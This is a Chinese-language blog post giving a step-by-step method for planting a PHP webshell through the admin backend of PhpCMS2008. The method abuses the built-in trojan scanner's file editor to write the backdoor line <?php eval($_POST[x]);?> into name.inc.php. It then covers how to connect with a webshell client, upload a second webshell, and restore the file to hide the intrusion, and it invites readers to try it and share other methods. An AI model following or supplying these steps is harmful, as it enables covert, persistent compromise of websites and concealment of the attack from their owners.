PhpCMS2008最新版本后台拿webshell

      下面来说我找到的后台拿webshell的方法。打开Phpcms网站后台管理地图，“模板风格”-->“Phpcms”，点“新建模板”来新建一个模板名称为test，文件名为test123.html的模板文件，

我发现在templates\default\phpcms目录下的name.inc.php文件中保存了Phpcms模块下的所有模板文件的名字以及模板的名称，如图8。

由于模板的名称没有过滤php代码，考虑通过修改新建模板的名称在name.inc.php中插入php一句话木马，但没有成功。修改新建的模板的名称为eval($_POST[x])，然后点系统设置-->系统工具-->木马扫描-->扫描木马，保持默认扫描设置，扫描木马，扫描出了templates/default/phpcms/name.inc.php，如图9。

点“操作”中的“查看”，显示了name.inc.php文件的代码，并且可以直接编辑代码，如图10。

把name.inc.php中的代码备份到一个文件中，方便拿到webshell后恢复，然后删除name.inc.php中的所有代码，插入php一句话的代码<?php eval($_POST[x]);?> ，点“修改”按钮后就把php一句话插入到了name.inc.php文件中，用lanker一句话PHP后门客户端3.0内部版连接http://127.0.0.1/phpcms/templates/default/phpcms/name.inc.php，成功得到webshell，如图11。通过这个webshell上传另外一个webshell，然后用备份的name.inc.php的代码恢复name.inc.php，删除新建的模板，后台拿webshell的目的达到。

    通过后台提供的扫描木马功能得到php木马，说来有点讽刺。如果程序能对新建模板的名称过滤下，也不会那么容易让人得到webshell。还是老习惯，我把phpcms2008sp3_gbk_100125(官方).zip打包给大家了，有兴趣的可以本机实际操作下。我只是找到了一种PhpCMS2008最新版本后台拿webhell的方法，如果有朋友有别的或更好的拿webshell的方法欢迎和我分享

标签分类：